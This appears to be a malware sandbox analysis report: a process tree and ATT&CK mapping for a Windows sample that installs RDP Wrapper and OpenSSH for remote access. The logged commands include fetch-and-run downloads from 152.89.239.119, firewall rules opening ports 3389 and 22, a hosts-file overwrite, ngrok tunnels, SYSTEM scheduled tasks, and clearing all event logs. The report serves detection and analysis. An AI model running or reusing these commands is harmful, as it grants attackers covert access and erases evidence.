  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:5704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Expand-Archive "update.zip" -DestinationPath "."
      4⤵
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:5308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
      4⤵
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      PID:5784
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
      4⤵
      Drops file in Program Files directory
      PID:5984
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:6076
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:1540
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:6120
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:6100
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:6048
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:6056
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:4916
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:956
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:6072
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:380
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
      4⤵
      Drops file in Program Files directory
      PID:5380
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:2504
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1576
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5432
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5612
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:5908
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:5776
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:5272
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:1632
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:5504
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:8
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:3108
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:3632
    - - C:\Windows\system32\findstr.exe
        
        findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:1532
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3168
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
      4⤵
      PID:4728
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:3112
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
  - - C:\Windows\system32\cmd.exe
      cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
      4⤵
      Drops file in Program Files directory
      PID:5032
    - - C:\Windows\system32\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        
        PID:4628
    - - C:\Windows\system32\sc.exe
        
        sc queryex "TermService"
        5⤵
        Launches sc.exe
        
        PID:2840
    - - C:\Windows\system32\find.exe
        
        find "STATE"
        5⤵
        
        PID:1160
    - - C:\Windows\system32\find.exe
        
        find /v "RUNNING"
        5⤵
        
        PID:3156
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        5⤵
        
        PID:3148
      - C:\Windows\system32\query.exe
        
        query session rdp-tcp
        6⤵
        
        PID:4224
        
        C:\Windows\system32\qwinsta.exe
        
        "C:\Windows\system32\qwinsta.exe" rdp-tcp
        7⤵
        
        PID:860
    - - C:\Windows\system32\reg.exe
        
        reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
        5⤵
        Server Software Component: Terminal Services DLL
        
        PID:5716
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5752
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3480
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4408
    - - C:\Windows\system32\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        
        PID:4788
    - - C:\Windows\system32\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        
        PID:2712
    - - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        5⤵
        
        PID:5852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        
        PID:3324
      - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        6⤵
        
        PID:5468
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        5⤵
        
        PID:3764
      - C:\Windows\system32\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        6⤵
        
        PID:2592
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        5⤵
        
        PID:1692
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        
        PID:4392
    - - C:\Windows\system32\PING.EXE
        
        ping -n 1 google.com
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:804
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        
        PID:2716
      - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        6⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:4308
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5932
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5856
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:5976
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4016
    - - C:\Windows\system32\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        
        PID:5940
    - - C:\Windows\system32\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        
        PID:2732
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        
        PID:1444
- - C:\Windows\system32\Dism.exe
    dism /Online /Add-Capability /CapabilityName:OpenSSH.Server~~~~0.0.1.0
    3⤵
    - Drops file in Windows directory
    PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exe
      C:\Users\Admin\AppData\Local\Temp\F8968626-3414-436A-BBD3-D88456FCCDEE\dismhost.exe {ABEAF7D4-C56A-488F-8743-53BA106065BB}
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      PID:2792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-Service -Name sshd -StartupType 'Automatic'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Service sshd
    3⤵
    PID:3748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
    3⤵
    PID:3384
- - C:\Windows\system32\cmd.exe
    cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
    3⤵
    PID:5168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6340 /prefetch:8
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6892 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6924 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,444829332378069343,14604412554678069687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:5856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2032

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4080

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:1080

C:\ProgramData\Windata\winlogin.exe
C:\ProgramData\Windata\winlogin.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C del %programdata%\Windata\update.bat && curl http://152.89.239.119/update.bat -o %programdata%\Windata\update.bat && cmd /C %programdata%\Windata\update.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4816
- - C:\Windows\SysWOW64\curl.exe
    curl http://152.89.239.119/update.bat -o C:\ProgramData\Windata\update.bat
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C C:\ProgramData\Windata\update.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5272
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C "attrib -r c:\Windows\System32\Drivers\etc\hosts"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5292
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -r c:\Windows\System32\Drivers\etc\hosts
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5308
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C "echo 197.206.92.151 262626.ddns.net > c:\Windows\System32\Drivers\etc\hosts"
      4⤵
      Drops file in Drivers directory
      System Location Discovery: System Language Discovery
      PID:5328

C:\ProgramData\Windata\WindowsUpdate.exe
C:\ProgramData\Windata\WindowsUpdate.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C %programdata%\Windata\ngrok.exe start --all
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4764
- - C:\ProgramData\Windata\ngrok.exe
    C:\ProgramData\Windata\ngrok.exe start --all
    3⤵
    - Executes dropped EXE
    PID:1580

C:\ProgramData\Windata\srlhost.exe
C:\ProgramData\Windata\srlhost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4068

C:\ProgramData\Windata\smhost.exe
C:\ProgramData\Windata\smhost.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3300
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\ProgramData\Windata\smhost.exe" "smhost.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:5988

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2472

C:\Windows\System32\OpenSSH\sshd.exe
C:\Windows\System32\OpenSSH\sshd.exe
1⤵
PID:5964
- C:\Windows\System32\OpenSSH\ssh-keygen.exe
  ssh-keygen -A
  2⤵
  PID:5992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry